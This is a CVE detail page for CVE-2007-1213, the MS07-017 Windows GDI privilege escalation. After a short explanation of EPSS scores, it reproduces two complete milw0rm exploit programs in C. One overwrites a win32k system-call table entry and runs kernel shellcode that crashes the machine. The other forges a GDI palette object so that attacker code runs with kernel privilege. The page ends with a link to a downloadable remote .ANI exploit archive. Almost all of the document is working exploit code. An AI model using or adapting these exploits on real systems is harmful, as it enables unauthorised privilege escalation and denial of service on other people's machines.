CVE-2007-1213 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#define _WIN32_WINNT 0x0500 #include <windows.h> #include <shlwapi.h> #include <stdio.h> #pragma comment (lib, "user32.lib") #pragma comment (lib, "gdi32.lib") #pragma comment (lib, "shlwapi.lib") #pragma comment (lib, "ntdll.lib") /* Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the win32k's SSDT by 0x2. before : lkd> dps bf998300 L 2 bf998300 bf934921 win32k!NtGdiAbortDoc bf998304 bf94648d win32k!NtGdiAbortPath after : lkd> dps bf998300 L 2 bf998300 00000002 bf998304 bf94648d win32k!NtGdiAbortPath win32k.sys bDeleteBrush (called by DeleteObject) mov esi, [edx] ;esi=pKernelInfo cmp [esi+4], ebx ; ebx=0, we need [esi+4]>0 mov eax, [edx+0Ch] mov [ebp+var_8], eax ja short loc_BF80C1E7 ;jump if [esi+4] > 0 loc_BF80C1E7: mov eax, [esi+24h] ; [esi+24] = addr to hijack (here win32k SSDT) mov dword ptr [eax], 2 ; !!!!! At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload. Tested on windows xp sp2 french last updates (before MS07-017) Coded by Ivanlef0u. http://ivanlef0u.free.fr ref: http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx http://research.eeye.com/html/alerts/zeroday/20061106.html http://projects.info-pull.com/mokb/MOKB-06-11-2006.html https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf https://www.securityfocus.com/bid/20940/info */ typedef struct { DWORD pKernelInfo; WORD ProcessID; WORD _nCount; WORD nUpper; WORD nType; DWORD pUserInfo; } GDITableEntry; typedef enum _SECTION_INFORMATION_CLASS { SectionBasicInformation, SectionImageInformation }SECTION_INFORMATION_CLASS; typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0 PVOID BaseAddress; ULONG Attributes; LARGE_INTEGER Size; }SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION; extern "C" ULONG __stdcall NtQuerySection( IN HANDLE SectionHandle, IN SECTION_INFORMATION_CLASS SectionInformationClass, OUT PVOID SectionInformation, IN ULONG SectionInformationLength, OUT PULONG ResultLength OPTIONAL ); extern "C" ULONG __stdcall NtAllocateVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG AllocationSize, IN ULONG AllocationType, IN ULONG Protect ); typedef LONG NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation=11, } SYSTEM_INFORMATION_CLASS; typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11 ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; extern "C" NTSTATUS __stdcall NtQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ); extern "C" ULONG __stdcall RtlNtStatusToDosError( NTSTATUS Status ); // generic kernel payload, reboot the b0x unsigned char Shellcode[]={ 0x60, //PUSHAD 0x55, //PUSH EBP 0x6A, 0x34, 0x5B, 0x64, 0x8B, 0x1B, 0x8B, 0x6B, 0x10, 0x8B, 0x45, 0x3C, 0x8B, 0x54, 0x05, 0x78, 0x03, 0xD5, 0x8B, 0x5A, 0x20, 0x03, 0xDD, 0x8B, 0x4A, 0x18, 0x49, 0x8B, 0x34, 0x8B, 0x03, 0xF5, 0x33, 0xFF, 0x33, 0xC0, 0xFC, 0xAC, 0x84, 0xC0, 0x74, 0x07, 0xC1, 0xCF, 0x0D, 0x03, 0xF8, 0xEB, 0xF4, 0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck 0x75, 0xE1, 0x8B, 0x42, 0x24, 0x03, 0xC5, 0x66, 0x8B, 0x0C, 0x48, 0x8B, 0x42, 0x1C, 0x03, 0xC5, 0x8B, 0x04 ,0x88, 0x03, 0xC5, 0x33, 0xDB, 0xB3, 0xE5, 0x53, 0xFF, 0xD0, 0x5D, //POP EBP 0x61, //POPAD 0xC3 //RET }; ULONG GetWin32kBase() { ULONG i, Count, Status, BytesRet; PSYSTEM_MODULE_INFORMATION pSMI; Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length if(Status!=STATUS_INFO_LENGTH_MISMATCH) printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status)); pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet); Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet); if(Status!=STATUS_SUCCESS) printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status)); /* The data returned to the SystemInformation buffer is a ULONG count of the number of handles followed immediately by an array of SYSTEM_MODULE_INFORMATION. */ Count=*(PULONG)pSMI; pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4); for(i=0; i<Count; i++) { if(StrStr((pSMI+i)->ImageName, "win32k.sys")) return (ULONG)(pSMI+i)->Base; } HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI); return 0; } ULONG buff[500]={0}; int main(int argc, char* argv[]) { ULONG i, PID, Status, Old; LPVOID lpMapAddress=NULL; HANDLE hMapFile=(HANDLE)0x10; GDITableEntry *gdiTable; SECTION_BASIC_INFORMATION SBI; WORD Upr; ULONG Size=0x1000; PVOID Addr=(PVOID)0x2; printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n" "http://ivanlef0u.free.fr\n" "Be MAD!\n"); //allocate memory at addresse 0x2 Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); if(Status) printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status); else printf("Addr : 0x%x OKAY\n", Addr); memcpy(Addr, Shellcode, sizeof(Shellcode)); printf("win32.sys base : 0x%x\n", GetWin32kBase()); ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc HBRUSH hBr; hBr=CreateSolidBrush(0); Upr=(WORD)((DWORD)hBr>>16); printf("0x%x\n", Upr); while(!lpMapAddress) { hMapFile=(HANDLE)((ULONG)hMapFile+1); lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0); } if(lpMapAddress==NULL) { printf("Error with MapViewOfFile : %d\n", GetLastError()); return 0; } Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0); if (Status) //!=STATUS_SUCCESS (0) { printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status); return 0; } printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart); gdiTable=(GDITableEntry *)lpMapAddress; PID=GetCurrentProcessId(); for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry)) { if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush { printf("gdiTable : 0x%x\n", gdiTable); printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo); printf("ProcessID : %d\n", gdiTable->ProcessID); printf("_nCount : %d\n", gdiTable->_nCount); printf("nUpper : 0x%x\n", gdiTable->nUpper); printf("nType : 0x%x\n", gdiTable->nType ); printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo); Old=gdiTable->pKernelInfo; gdiTable->pKernelInfo=(ULONG)buff; //crafted buff break; } gdiTable++; } if(!DeleteObject(hBr)) printf("Error with DeleteObject : %d\n", GetLastError()); else printf("Done\n"); printf("Buff : 0x%x\n", buff); memset(buff, 0x90, sizeof(buff)); buff[0]=0x1; //!=0 buff[0x24/4]=Win32kSST; //syscall to modifY buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr if(!DeleteObject(hBr)) printf("Error with DeleteObject : %d\n", GetLastError()); gdiTable->pKernelInfo=Old; //restore old value /* lkd> uf GDI32!NtGdiAbortDoc GDI32!NtGdiAbortDoc: 77f3073a b800100000 mov eax,1000h 77f3073f ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300) 77f30744 ff12 call dword ptr [edx] 77f30746 c20400 ret 4 */ __asm { mov eax, 0x1000 mov edx,0x7ffe0300 call dword ptr [edx] } return 0; } // milw0rm.com [2007-04-08]

/* GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017) Coded by Lionel d'Hauenens http://www.labo-asso.com Development: ------------ Dev-C++ 4.9.9.2 Linked with /lib/libgdi32.a References: ----------- http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx http://research.eeye.com/html/alerts/zeroday/20061106.html http://www.milw0rm.com/exploits/3688 http://ivanlef0u.free.fr/?p=41 March 16, 2007 */ #include <stdio.h> #include <stdlib.h> #include <windows.h> typedef enum _SECTION_INFORMATION_CLASS { SectionBasicInformation, SectionImageInformation } SECTION_INFORMATION_CLASS; typedef struct _SECTION_BASIC_INFORMATION { ULONG Base; ULONG Attributes; LARGE_INTEGER Size; } SECTION_BASIC_INFORMATION; typedef struct _GDI_TABLE_ENTRY { PVOID pKernelInfo; WORD ProcessID; WORD _nCount; WORD nUpper; BYTE nType; BYTE flags; PVOID pUserInfo; } GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY; typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG); NTQUERYSECTION NtQuerySection; #define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix"); #define STATUS_SUCCESS 0 #define PAL_TYPE 8 DWORD flag_test; hook (HANDLE pal, COLORREF couleur) { // INT3 // Executed code with kernel privilege asm (".intel_syntax noprefix"); __asm ("cli"); // it's the fiesta !!! :) __asm ("sti"); asm (".att_syntax noprefix"); flag_test = 1; return (TRUE); } int main(int argc, char *argv[]) { SECTION_BASIC_INFORMATION SectionInfo; PGDI_TABLE_ENTRY pGdiEntry; PLOGPALETTE pLogPal; HANDLE hPal; PVOID OriginalPalObject; PVOID FalsePalObject; HANDLE hThread = GetCurrentThread(); DWORD OriginalThreadPriotity = GetThreadPriority (hThread); HANDLE hSection = (ULONG)0; PVOID MapFile = 0; HANDLE hProcess = (HANDLE)0xFFFFFFFF; WORD Pid = GetCurrentProcessId(); NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection"); printf ("##########################################################\n"); printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n"); printf ("# All Windows 2000/XP before MS07-017 patch #\n"); printf ("##########################################################\n"); printf ("# coded by Lionel d'Hauenens http://www.labo-asso.com #\n"); printf ("##########################################################\n\n"); // Search handle section and mapper in virtual memory of user while ((DWORD)hSection<0xFFFF) { SectionInfo.Attributes = 0; MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); if (MapFile) { NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0); if (SectionInfo.Attributes == SEC_COMMIT) break; // For compatibility with win2k UnmapViewOfFile(MapFile); MapFile = 0; } hSection++; } if (!MapFile) { printf ("Could not found shared section !\n"); exit(0); } // Create Palette pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1); pLogPal->palNumEntries = 1; pLogPal->palVersion = 0x300; hPal = (HANDLE)CreatePalette(pLogPal); if (!hPal) { printf ("Could not create palette !\n"); exit(0); } // Search the entry of pal object OriginalPalObject = (PVOID)0; pGdiEntry = (PGDI_TABLE_ENTRY)MapFile; while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart) { if ( pGdiEntry->ProcessID == Pid && pGdiEntry->nType == PAL_TYPE ) { // Save original pointer OriginalPalObject = (PVOID)pGdiEntry->pKernelInfo; break; } pGdiEntry++; } if (!OriginalPalObject) { printf ("Could not find entry of Pal object !\n"); exit(0); } // Create the false Pal object FalsePalObject = (PVOID) calloc(0x100/4,4); ((PDWORD)FalsePalObject)[0] = (DWORD)hPal; // Handle ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1; // Availabled flag ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex printf ("Section:\n--------\n"); printf ("Handle: 0x%08X Attributes: %08X Size: 0x%08X\n\n", hSection , SectionInfo.Attributes , SectionInfo.Size.QuadPart); printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); printf ("Address of user map: 0x%08X\n", MapFile); printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject); printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) ); printf ("Address of Hook(): 0x%08X\n\n", &hook); ////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////// printf ("->Test..."); flag_test = 0; SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); // Active false Pal object pGdiEntry->pKernelInfo = FalsePalObject; GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :); // Restore original Pal object pGdiEntry->pKernelInfo = OriginalPalObject; SetThreadPriority (hThread,OriginalThreadPriotity); ////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////// if (!flag_test) printf ("ERROR !!!\n"); else printf ("OK :)\n"); UnmapViewOfFile(MapFile); DeleteObject ((HANDLE)hPal); free((PVOID)pLogPal); free((PVOID)FalsePalObject); system("PAUSE"); return (0); } // milw0rm.com [2007-04-17]

MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip) # milw0rm.com [2007-04-26]